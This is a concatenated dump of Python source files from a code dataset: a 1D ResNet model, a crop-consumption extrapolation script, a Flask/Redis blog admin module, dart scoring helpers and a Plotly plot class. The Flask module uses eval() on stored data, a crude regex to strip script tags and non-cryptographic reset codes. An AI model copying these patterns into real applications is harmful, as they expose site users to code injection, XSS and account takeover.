self.conv1 and self.downsample layers downsample the input when stride != 1\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = norm_layer(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = norm_layer(planes)\n self.downsample = downsample\n self.stride = stride\n\n self.coordconv = CoordConv1d(inplanes, planes, 3 ,stride=stride, with_r=True)\n\n def forward(self, x: Tensor) -> Tensor:\n identity = x\n\n out = self.coordconv(x)\n #out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n # Bottleneck in torchvision places the stride for downsampling at 3x3 convolution(self.conv2)\n # while original implementation places the stride at the first 1x1 convolution(self.conv1)\n # according to \"Deep residual learning for image recognition\"https://arxiv.org/abs/1512.03385.\n # This variant is also known as ResNet V1.5 and improves accuracy according to\n # https://ngc.nvidia.com/catalog/model-scripts/nvidia:resnet_50_v1_5_for_pytorch.\n\n expansion: int = 4\n\n def __init__(\n self,\n inplanes: int,\n planes: int,\n stride: int = 1,\n downsample: Optional[nn.Module] = None,\n groups: int = 1,\n base_width: int = 64,\n dilation: int = 1,\n norm_layer: Optional[Callable[..., nn.Module]] = None\n ) -> None:\n super(Bottleneck, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm1d\n width = int(planes * (base_width / 64.)) * groups\n # Both self.conv2 and self.downsample layers downsample the input when stride != 1\n self.conv1 = conv1x1(inplanes, width)\n self.bn1 = norm_layer(width)\n self.conv2 = conv3x3(width, width, stride, groups, dilation)\n self.bn2 = norm_layer(width)\n self.conv3 = conv1x1(width, planes * self.expansion)\n self.bn3 = norm_layer(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x: Tensor) -> Tensor:\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(\n self,\n block: Type[Union[BasicBlock, Bottleneck]],\n layers: List[int],\n num_classes: int = 3,\n zero_init_residual: bool = False,\n groups: int = 1,\n width_per_group: int = 64,\n replace_stride_with_dilation: Optional[List[bool]] = None,\n norm_layer: Optional[Callable[..., nn.Module]] = None\n ) -> None:\n super(ResNet, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm1d\n self._norm_layer = norm_layer\n\n self.inplanes = 64\n self.dilation = 1\n if replace_stride_with_dilation is None:\n # each element in the tuple indicates if we should replace\n # the 2x2 stride with a dilated convolution instead\n replace_stride_with_dilation = [False, False, False]\n if len(replace_stride_with_dilation) != 3:\n raise ValueError(\"replace_stride_with_dilation should be None \"\n \"or a 3-element tuple, got {}\".format(replace_stride_with_dilation))\n self.groups = groups\n self.base_width = width_per_group\n self.conv1 = nn.Conv1d(channel_size, self.inplanes, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = norm_layer(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool1d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2,\n dilate=replace_stride_with_dilation[0])\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2,\n dilate=replace_stride_with_dilation[1])\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2,\n dilate=replace_stride_with_dilation[2])\n self.avgpool = nn.AdaptiveAvgPool1d(1)\n self.fc = nn.Linear(512 * block.expansion, num_classes)\n self.softmax = nn.Softmax()\n\n for m in self.modules():\n if isinstance(m, nn.Conv1d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm1d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0) # type: ignore[arg-type]\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0) # type: ignore[arg-type]\n\n def _make_layer(self, block: Type[Union[BasicBlock, Bottleneck]], planes: int, blocks: int,\n stride: int = 1, dilate: bool = False) -> nn.Sequential:\n norm_layer = self._norm_layer\n downsample = None\n previous_dilation = self.dilation\n if dilate:\n self.dilation *= stride\n stride = 1\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n norm_layer(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, self.groups,\n self.base_width, previous_dilation, norm_layer))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes, groups=self.groups,\n base_width=self.base_width, dilation=self.dilation,\n norm_layer=norm_layer))\n\n return nn.Sequential(*layers)\n\n def _forward_impl(self, x: Tensor) -> Tensor:\n # See note [TorchScript super()]\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.fc(x)\n x = self.softmax(x)\n\n return x\n\n def forward(self, x: Tensor) -> Tensor:\n return self._forward_impl(x)\n\n\nclass MPL(nn.Module):\n\n def __init__(\n self,\n num_classes: int = 3,\n zero_init_residual: bool = False,\n replace_stride_with_dilation: Optional[List[bool]] = None,\n norm_layer: Optional[Callable[..., nn.Module]] = None\n ) -> None:\n super(MPL, self).__init__()\n self.inplanes = 64\n\n self.conv1 = nn.Conv1d(channel_size, self.inplanes, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = nn.BatchNorm1d(self.inplanes)\n self.bn2 = nn.BatchNorm1d(self.inplanes)\n self.bn3 = nn.BatchNorm1d(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool1d(kernel_size=3, stride=2, padding=1)\n\n self.fc1 = nn.Linear(98, 50)\n self.fc2 = nn.Linear(50, 1)\n self.fc3 = nn.Linear(self.inplanes, num_classes)\n #self.fc3 = nn.Linear(64, num_classes)\n self.softmax = nn.Softmax()\n\n for m in self.modules():\n if isinstance(m, nn.Conv1d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm1d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def _forward_impl(self, x: Tensor) -> Tensor:\n # See note [TorchScript super()]\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n #x = self.maxpool(x)\n\n x = self.fc1(x)\n #x = self.relu(x)\n x = self.fc2(x)\n #x = self.relu(x)\n x = torch.flatten(x,1)\n x = self.fc3(x)\n x = self.softmax(x)\n\n return x\n\n def forward(self, x: Tensor) -> Tensor:\n return self._forward_impl(x)\n\n\ndef _resnet(\n arch: str,\n block: Type[Union[BasicBlock, Bottleneck]],\n layers: List[int],\n pretrained: bool,\n progress: bool,\n **kwargs: Any\n) -> ResNet:\n model = ResNet(block, layers, **kwargs)\n if pretrained:\n state_dict = load_state_dict_from_url(model_urls[arch],\n progress=progress)\n model.load_state_dict(state_dict)\n return model\n\ndef mpl(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:\n r\"\"\"ResNet-18 model from\n `\"Deep Residual Learning for Image Recognition\" `_.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return MPL()\n\n\n\ndef resnet18(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:\n r\"\"\"ResNet-18 model from\n `\"Deep Residual Learning for Image Recognition\" `_.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _resnet('resnet18', BasicBlock, [2, 2, 2, 2], pretrained, progress,\n **kwargs)\n\n\ndef resnet34(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:\n r\"\"\"ResNet-34 model from\n `\"Deep Residual Learning for Image Recognition\" `_.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _resnet('resnet34', BasicBlock, [3, 4, 6, 3], pretrained, progress,\n **kwargs)\n\n\ndef resnet50(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:\n r\"\"\"ResNet-50 model from\n `\"Deep Residual Learning for Image Recognition\" `_.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _resnet('resnet50', Bottleneck, [3, 4, 6, 3], pretrained, progress,\n **kwargs)\n\n\ndef resnet101(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:\n r\"\"\"ResNet-101 model from\n `\"Deep Residual Learning for Image Recognition\" `_.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _resnet('resnet101', Bottleneck, [3, 4, 23, 3], pretrained, progress,\n **kwargs)\n\n\ndef resnet152(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:\n r\"\"\"ResNet-152 model from\n `\"Deep Residual Learning for Image Recognition\" `_.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _resnet('resnet152', Bottleneck, [3, 8, 36, 3], pretrained, progress,\n **kwargs)\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":19373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"357872309","text":"import pandas as pd\nimport numpy as np\nimport scipy.stats as stat\nimport matplotlib.pyplot as plt\nimport progressbar\nimport random\n\"\"\" calculates percentage crop contributions to human food consumption to 2050.\n\n main function( path for input data,\n start year of extrapolated data,\n end year of extrapolated data,\n start of year of data file) \"\"\"\n\ndef main(in_str, start_yr, end_yr, data_start_yr, **kwargs):\n\n # start year and end year in data\n dat_start = start_yr - data_start_yr\n dat_end = end_yr - data_start_yr\n\n # reduction factor if exp used\n reduct_factor = 1.0/2.5\n for key, value in kwargs.items():\n if key == \"reduct_factor\":\n reduct_factor = value\n\n # crop percentages in (1970 - 2010)\n input = pd.read_csv(in_str)\n columns = input.columns.to_list()\n\n output = pd.DataFrame(columns = columns, index = np.arange(2000, 2051, 1))\n\n # array for error messages !!!(unused as of yet)!!!\n flags = []\n\n # normalise input to 100% if not\n for i in range(0, len(input)):\n sum = np.sum(input.iloc[i,:])\n if abs(sum - 1) > 0.0000001:\n for j in range(0, len(input.iloc[i,:])):\n input.iloc[i,j] = input.iloc[i,j]/sum\n\n # for each var determine 2050 value\n for j in range(0, len(input.iloc[0,:])):\n\n # linear trajectories\n lin_params = stat.linregress(np.arange(start_yr, end_yr + 1, 1), input.iloc[dat_start:dat_end+1,j])\n\n # if linear trajectory is < 0 by 2050, use exponential decay to 0.1 * 2010 value\n if lin_params[0] * 2050 + lin_params[1] < 0.0:\n flagstr = columns[j] + \" 2050 is less than 0.0%, using exponential decay\"\n flags.append(flagstr)\n start_val = lin_params[0] * 2010 + lin_params[1]\n end_val = start_val*reduct_factor\n exp_b = np.log(end_val/start_val) / (end_yr - start_yr)\n exp_a = start_val/np.exp(2010*exp_b)\n\n for i in range(0, 51):\n if i < 11:\n output.iloc[i, j] = lin_params[0] * (2000 + i) + lin_params[1]\n else:\n output.iloc[i, j] = exp_a * np.exp((i+2000)*exp_b)\n\n # if linear takes value to to > 0, ####################### FIX ME FIX ME - assess what is a reasonable max perc???\n elif lin_params[0] * 2050 + lin_params[1] > 100.0:\n flagstr = columns[j] + \" 2050 is greater than 100.0%, using exponential growth !!! FIX ME !!!\"\n flags.append(flagstr)\n start_val = lin_params[0] * 2010 + lin_params[1]\n end_val = 0.5\n exp_b = np.log(end_val / start_val) / (end_yr - start_yr)\n exp_a = start_val / np.exp( 2010 * exp_b)\n\n for i in range(0, 51):\n if i < 11:\n output.iloc[i, j] = lin_params[0] * (2000 + i) + lin_params[1]\n else:\n output.iloc[i, j] = exp_a * np.exp((i+2000)*exp_b)\n\n # otherwise just use linear\n else:\n for i in range(0, 51):\n output.iloc[i, j] = lin_params[0] * (2000 + i) + lin_params[1]\n\n # normalise output to 100\n for i in range(0, len(output)):\n sum = np.sum(output.iloc[i,:])\n if abs(sum - 1) > 0.0000001:\n for j in range(0, len(output.iloc[i,:])):\n output.iloc[i,j] = output.iloc[i,j]/sum\n\n for key, value in kwargs.items():\n if key == \"plot\" and value == True:\n\n def randcolor():\n color = (random.randint(30,80)/100, random.randint(10,100)/100, random.randint(30,80)/100)\n return color\n colors = []\n #colors = [\"#508d4e\", \"#6aae68\", \"#87dd84\", \"#bff6bd\", \"#a94b0c\", \"#ea650d\", \"#f2b287\", \"#db6c22\", \"#e5dbb0\", \"#8bc8df\", \"#cbcc99\"]\n for j in range(0, len(columns)):\n color = randcolor()\n colors.append(color)\n for j in range(0, len(columns)):\n plt.fill_between(np.arange(2000, 2051, 1), np.full((51), 1), np.sum(output.iloc[:, 0:j], axis=1), color = colors[j])\n plt.xlim(2000, 2050)\n plt.ylim(0,1)\n plt.legend(columns)\n plt.show()\n\n return output\n","sub_path":"perc_contributions.py","file_name":"perc_contributions.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"486234613","text":"# coding: UTF-8\nfrom flask import render_template, session, redirect, \\\n url_for,g,flash,request,current_app\nimport sys\n#sys.path.insert(0,r\"C:\\Users\\Administrator\\Desktop\\VPS\\myweb\")\nsys.path.insert(0,\"/var/www/FlaskApp\")\nfrom redis import Redis\nfrom datetime import datetime\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField,PasswordField\nfrom wtforms.validators import Required,Regexp,Email,EqualTo\nfrom flask_mail import Message\nfrom werkzeug.security import generate_password_hash\nfrom threading import Thread\nimport lxml.etree as etree\nimport random ,re\nfrom FlaskApp import pool,mail\nfrom . import admin\n\nMESSAGES_PER_PAGE=10 #消息分页\nCOMMENTS_PER_PAGE=10 #评论分页\nARTICLES_PER_PAGE=10 #文章分页\n\nclass ChangeForm(FlaskForm):#找回密码\n catch=StringField('请输入验证码', validators=[Required()])\n password=PasswordField('密码', validators=[Regexp('[a-zA-Z\\d]{6,}',message='密码只包含数字和字母且不少于6位'),EqualTo('password1', message='两次密码要相同')])\n password1=PasswordField('确认密码')\n submit = SubmitField('Submit')\n\nclass MailForm(FlaskForm):\n name=StringField('请输入用户名', validators=[Required()])\n email=StringField('请输入注册时的邮箱', validators=[Required(),Email(message='邮箱格式不正确')])\n submit = SubmitField('下一步')\n\n\n@admin.before_request\ndef before_request():#创建数据库连接\n g.db=Redis(connection_pool=pool)\n \n@admin.teardown_request\ndef teardown_request(exception):#释放数据库连接\n if getattr(g,'db',None):\n del g.db\n\n\n@admin.route('/')#查看自己主页\n@admin.route('/')#查看他人主页,看不到评论内容\ndef manage(user=None): #管理主页,包含文章和评论\n if (not session.get('login'))or(not session.get('name')):\n flash('没有登录')\n return redirect(url_for('main.index'))\n if user:\n a=get_articles(g.db,user)\n count=len(g.db.zrevrange('articles:'+user,0,-1))\n else:\n a=get_articles(g.db,session.get('name'))\n count=len(g.db.zrevrange('articles:'+session.get('name'),0,-1))\n return render_template('admin/manage.html',\n name=session.get('name'),login=session.get('login'),user=user,\n a=a,current_time=datetime.utcnow(),count=count,image=session.get('image_url'))\n\n\n@admin.route('/message/') #来自他人的@消息\ndef message():\n if (not session.get('login'))or(not session.get('name')):\n flash('没有登录')\n return redirect(url_for('main.index'))\n name=session.get('name')\n g.db.set(name+':mes_count',0)\n a=[]\n mes=g.db.zrevrange(name+':messages',0,10)\n for i in mes:\n new=dict()\n try:\n new['article']=article_id=g.db.hget(i,'article').decode('utf-8')\n new['title']=g.db.hget(article_id,'title').decode('utf-8')\n except:\n g.db.zrem(name+':messages',i)\n g.db.delete(i)\n continue\n new['user']=g.db.hget(i,'user').decode('utf-8')\n new['time']=g.db.hget(i,'time').decode('utf-8')\n if g.db.hget(i,'touser'):\n new['to']=g.db.hget(i,'touser').decode('utf-8')\n a.append(new)\n return render_template('admin/messages.html',login=True,name=name,a=a,current_time=datetime.utcnow(),image=session.get('image_url'))\n\n@admin.route('/get_mes_count',methods=['POST'])\ndef get_mes_count():\n if (not session.get('login'))or(not session.get('name')):\n return ''\n count=g.db.get(session.get('name')+':mes_count')\n if count:\n count=count.decode('utf-8')\n return count\n else:\n return ''\n \n@admin.route('///')#文章的详细内容\ndef detail(user,article_id):\n if not session.get('login'):\n flash('没有登录')\n return redirect(url_for('main.index'))\n content=g.db.hgetall(article_id)\n new=dict()\n for key,value in content.items():\n new[key.decode('utf-8')]=value.decode('utf-8')\n #new['time']=new.get('time').split('.')[0]\n new['type']=eval(new['type'])\n new['id']=article_id\n pos=g.db.zrevrank('articles:'+user,article_id)\n if not isinstance(pos,int):\n up=None\n down=None\n else:\n if(pos==0):\n up=None\n down=g.db.zrevrange('articles:'+user,pos+1,pos+2)\n if down:\n down=down[0]\n else:\n up=g.db.zrevrange('articles:'+user,pos-1,pos)\n down=g.db.zrevrange('articles:'+user,pos+1,pos+2)\n if down:\n down=down[0]\n if up:\n up=up[0]\n u=g.db.smembers('user:')\n s=[]\n for i in u:\n s.append(i.decode('utf-8'))\n return render_template('admin/detail.html',\n name=session.get('name'),login=session.get('login'),\n a=new,current_time=datetime.utcnow(),up=up,down=down,user=user,s=s,image=session.get('image_url'))\n \n \n \n\ndef get_articles(db,name):#获取文章第一页内容\n articles=db.zrevrange('articles:'+name,0,-1)\n a=[]\n if len(articles)>ARTICLES_PER_PAGE:\n articles=articles[0:ARTICLES_PER_PAGE]\n for article in articles:\n b=[]\n content=db.hgetall(article)\n new=dict()\n for key,value in content.items():\n new[key.decode('utf-8')]=value.decode('utf-8')\n #new['time']=new.get('time').split('.')[0]\n new['type']=eval(new['type'])\n new['summary']=summary(etree.HTML(new.get('text')).xpath('//text()'))\n if(new):\n b.append(article)\n b.append(new)\n a.append(b)\n \n return a\n \n@admin.route('/change/')#修改文章\ndef change(article_id):\n if (not session.get('login'))or(not session.get('name')):\n flash('没有登录')\n return redirect(url_for('main.index'))\n content=g.db.hgetall(article_id)\n name=content[b'poster'].decode('utf-8')\n title=content[b'title'].decode('utf-8')\n text=content[b'text'].decode('utf-8')\n if (session.get('name')==name):\n return render_template('edit/change.html',text=text,article_id=article_id,title=title,\n login=session.get('login'),name=session.get('name'),image=session.get('image_url'))\n else:\n return redirect(url_for('main.index'))\n \n@admin.route('/savechange',methods=['POST'])#保存文章修改\ndef savechange():\n if (not session.get('login'))or(not session.get('name')):\n flash('没有登录')\n return redirect(url_for('main.index'))\n article_id=request.form.get('article_id')\n content=g.db.hgetall(article_id)\n name=content[b'poster'].decode('utf-8')\n text=re.sub(r'|','js',request.form.get('text'))\n if (session.get('name')==name):\n g.db.hset(article_id,'text',text)\n return redirect(url_for('admin.manage'))\n \n\n\n@admin.route('/del/',methods=['POST'])#删除文章\ndef delete(article_id):\n if (not session.get('login'))or(not session.get('name')):\n flash('没有登录')\n return redirect(url_for('main.index'))\n content=g.db.hgetall(article_id)\n name=content[b'poster'].decode('utf-8')\n typ=eval(content[b'type'].decode('utf-8'))\n if (session.get('name')==name):\n comments=g.db.zrange(article_id+':comments',0,-1)\n for i in comments:\n g.db.delete(i)\n g.db.delete(article_id+':comments')\n g.db.zrem('time:',article_id) \n g.db.zrem('articles:'+name,article_id)\n for ty in typ:\n g.db.zrem('articles:'+ty+':',article_id)\n g.db.delete(article_id)\n return 'ok'\n\n@admin.route('/page_articles/')#文章分页内容\ndef page_articles(page):\n if page<2:\n return ''\n if session.get('login'):\n if request.args['user']!='None':\n name=request.args['user']\n else:\n name=session.get('name')\n start=(page-1)*ARTICLES_PER_PAGE\n end=start+ARTICLES_PER_PAGE-1\n articles=g.db.zrevrange('articles:'+name,start,end)\n a=[]\n for article in articles:\n b=[]\n content=g.db.hgetall(article)\n new=dict()\n for key,value in content.items():\n new[key.decode('utf-8')]=value.decode('utf-8')\n #new['time']=new.get('time').split('.')[0]\n new['type']=eval(new['type'])\n new['summary']=summary(etree.HTML(new.get('text')).xpath('//text()'))\n if(new):\n b.append(article)\n b.append(new)\n a.append(b)\n return render_template('admin/page_articles.html',a=a,name=session.get('name'))\n else:\n return ''\n\n#修改密码 \n@admin.route('/forget/begin/',methods=['GET','POST']) \ndef forget_begin():\n form=MailForm()\n if form.validate_on_submit():\n if g.db.sismember('mail:',form.email.data) and g.db.sismember('user:',form.name.data):\n recipients=[]\n recipients.append(form.email.data)\n letter='abcdefghijklm012345nopqrstuvwxy6789z'\n catch=random.choice(letter)+random.choice(letter)+random.choice(letter)+random.choice(letter)+random.choice(letter)\n g.db.set('user:'+form.name.data+':forget',catch)\n g.db.expire('user:'+form.name.data+':forget',300)\n session['name']=form.name.data\n send_mail(catch,recipients)\n session['r']=True\n flash('请检查邮件中的验证码')\n return redirect(url_for('.forget_next'))\n else:\n return render_template('admin/forget1.html',form=form)\n\n@admin.route('/forget/next/',methods=['GET','POST'])\ndef forget_next():\n form=ChangeForm()\n if form.validate_on_submit():\n if not session.get('r'):\n flash('修改失败')\n return redirect(url_for('main.index'))\n catch=g.db.get('user:'+session['name']+':forget')\n if catch:\n if catch.decode('utf-8')==form.catch.data:\n g.db.hset('user:'+session['name'],'password',generate_password_hash(form.password.data))\n g.db.save()\n flash('修改成功')\n else:\n flash('验证码错误')\n return redirect(url_for('.forget_next'))\n else:\n flash('修改失败')\n return redirect(url_for('main.index'))\n else:\n return render_template('admin/forget1.html',form=form)\n\n#管理评论\n'''\n@admin.route('/comments/')\ndef mycomments():\n if not session.get('login') or not session.get('name'):\n return redirect(url_for('main.index'))\n count=len(g.db.zrevrange(session.get('name')+':comments',0,-1))\n comments=g.db.zrevrange(session.get('name')+':comments',0,COMMENTS_PER_PAGE-1)\n a=[]\n for i in comments:\n com=g.db.hgetall(i)\n if not com:\n g.db.zrem(session.get('name')+':comments',i)\n continue\n new=dict()\n for key,value in com.items():\n new[key.decode('utf-8')]=value.decode('utf-8')\n try:\n new['title']=g.db.hget(new['article'],'title').decode('utf-8')\n except:\n #g.db.zrem(session.get('name')+':comments',com)\n new['title']='该文章已被删除'\n a.append(new)\n return render_template('admin/comments.html',a=a,current_time=datetime.utcnow(),count=count,name=session.get('name'),login=session.get('login'),image=session.get('image_url'))\n\n'''\n@admin.route('/comments/')#评论分页内容\ndef page_mycomments(page):\n if not session.get('login') or not session.get('name'):\n return ''\n if page<1:\n return ''\n start=(page-1)*COMMENTS_PER_PAGE\n end=start+COMMENTS_PER_PAGE-1\n comments=g.db.zrevrange(session.get('name')+':comments',start,end)\n a=[]\n for i in comments:\n com=g.db.hgetall(i)\n if not com:\n g.db.zrem(session.get('name')+':comments',i)\n continue\n new=dict()\n for key,value in com.items():\n new[key.decode('utf-8')]=value.decode('utf-8')\n try:\n new['title']=g.db.hget(new['article'],'title').decode('utf-8')\n except:\n #g.db.zrem(session.get('name')+':comments',i)\n g.db.delete(i)\n new['title']='该文章已被删除'\n a.append(new)\n else:\n a.append(new)\n return render_template('admin/page_comments.html',a=a)\n\n#找回密码时要发送邮件,异步发送\ndef send_async_email(app, msg):\n with app.app_context():\n mail.send(msg)\n\ndef send_mail(catch,recipients):\n app = current_app._get_current_object()\n msg = Message(subject=\"修改密码\", sender='2452559168@qq.com', recipients=recipients)\n msg.html =render_template('admin/email.html',catch=catch)\n thr = Thread(target=send_async_email, args=[app, msg])\n thr.start()\n return thr\n\ndef summary(l):\n s=''\n for i in l:\n s+=i\n if(len(s)>50):\n break\n return s\n\n\n","sub_path":"admin_bp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"308189520","text":"import constants as con\nfrom general_use_functions import *\n\n\ndef create_players(number_of_players):\n # taking users number of players and creating them\n if number_of_players > 0:\n for i in range(number_of_players):\n new_player = input(\"Podaj nazwię gracza %d: \" % (i + 1))\n score_board.update({new_player: con.start_points_std})\n else:\n print(\"Nieprawidłowa ilość graczy.\")\n\n\ndef player_name(number_of_player):\n # get player name\n name_list = list(score_board.keys())\n return name_list[number_of_player - 1]\n\n\ndef player_score(number_of_player):\n # get player score\n points_list = list(score_board.values())\n return points_list[number_of_player - 1]\n\n\ndef end_check(player):\n # check if players properly ends game according to rules of dart\n while True:\n temp_command = input(\"Czy wynik wyzerowany double'm ? Y/N\\n\").lower()\n if temp_command == \"y\":\n print(f\"\\nGratulacje !\\nWygrał {player}.\")\n exit_protocol()\n elif temp_command == \"n\":\n return None\n else:\n print(\"Nieprawidłowa komenda.\")\n continue\n\n\ndef player_hint(temp_score):\n # gives ending hints for players - which points score to end game\n score = possible_score_standard()\n score.sort(reverse=True)\n score = [0] + score\n hint = []\n for i in score:\n for j in score:\n for k in score:\n if (k % 2 == 0 and k <= 40 and k != 0) and i + j + k == temp_score:\n if i != 0:\n hint.append(hint_parts(i)[0])\n if j != 0:\n hint.append(hint_parts(j)[0])\n return hint + [f'D{int(k / 2)}']\n elif k == 50 and i + j + k == temp_score:\n if i != 0:\n hint.append(hint_parts(i)[0])\n if j != 0:\n hint.append(hint_parts(j)[0])\n return hint + ['DB']\n\n\ndef hint_parts(d):\n # get prefix of hint numbers (single, double, triple, single/double bull)\n hint = []\n if d <= 20:\n hint.append(f'S{d}')\n if d <= 40 and d % 2 == 0:\n hint.append(f'D{int(d / 2)}')\n if d <= 60 and d % 3 == 0:\n hint += [f'T{int(d / 3)}']\n if d == 50:\n hint += ['DB']\n if d == 25:\n hint += ['SB']\n return hint\n\n\ndef throw(number_of_player):\n # score counting and program behaviour while rounds/throws\n player = player_name(number_of_player)\n temp_score = player_score(number_of_player)\n throws = 0\n while throws < 3:\n try:\n command = input(f\"{player} - rzut {throws + 1}: \").lower()\n throw_score = int(command)\n # if throw score is possible to get\n if int(throw_score) in possible_score_standard():\n if temp_score > 0:\n throws += 1\n points_left = temp_score - throw_score\n temp_score = points_left\n if temp_score == 0:\n if end_check(player) is None:\n throws = 3\n temp_score = player_score(number_of_player)\n continue\n if temp_score < 1:\n throws = 3\n temp_score = player_score(number_of_player)\n print(\"FURAAA !\")\n continue\n else:\n print(f\"Punkty: {temp_score}\")\n if player_hint(temp_score) is None:\n pass\n else:\n print(*player_hint(temp_score), sep=\", \")\n continue\n else:\n print(con.wrong_throw)\n continue\n # different user commends or ValueError\n except ValueError:\n # giving user possibility to exit or reset round\n if command == \"exit\":\n exit_protocol()\n elif command == \"hard reset\":\n throws = 0\n temp_score = player_score(number_of_player)\n print(\"Runda zresetowana.\")\n continue\n elif command == \"reset\":\n if throws == 0:\n print(\"Nie masz rundy do resetowania.\")\n else:\n throws -= 1\n points_left = temp_score + throw_score\n temp_score = points_left\n print(f\"Punkty: {temp_score}\")\n else:\n print(con.wrong_throw)\n continue\n # score updating for next throw/round\n score_board.update({player: temp_score})\n print(\"\\n\")\n\n\n# creating dict and flags\nscore_board = {}\nplaying = False\n","sub_path":"dart_standard_functions.py","file_name":"dart_standard_functions.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"581890041","text":"from data_processing.group_data_multiple import GroupDataMultiple\nimport plotly.express as px\nimport dash_core_components as dcc\n\n\nclass ActualPlot:\n\n @staticmethod\n def build_graph(filenames, time_select, avg_total, is_predicted):\n is_total = True\n if avg_total == 'average':\n is_total = False\n columns = ['Actual']\n if is_predicted:\n columns.append('Predicted')\n\n df = None\n if (isinstance(filenames, str)):\n filenames = [filenames]\n if time_select == 'hourly':\n df = GroupDataMultiple.get_hourly(filenames, columns)\n elif time_select == 'daily':\n df = GroupDataMultiple.get_daily(filenames, is_total, columns)\n elif time_select == 'weekly':\n df = GroupDataMultiple.get_weekly(filenames, is_total, columns)\n else:\n df = GroupDataMultiple.get_monthly(filenames, is_total, columns)\n\n\n fig = px.line(df)\n fig.update_yaxes(title_text='Energy Usage (kw/hr)')\n fig.update_layout(\n xaxis=dict(\n rangeselector=dict(\n buttons=list([\n dict(count=1,\n label=\"1m\",\n step=\"month\",\n stepmode=\"backward\"),\n dict(count=6,\n label=\"6m\",\n step=\"month\",\n stepmode=\"backward\"),\n dict(count=1,\n label=\"YTD\",\n step=\"year\",\n stepmode=\"todate\"),\n dict(count=1,\n label=\"1y\",\n step=\"year\",\n stepmode=\"backward\"),\n dict(step=\"all\")\n ])\n ),\n rangeslider=dict(\n visible=True\n ),\n type=\"date\"\n )\n )\n graph = dcc.Graph(\n figure=fig\n\n )\n return 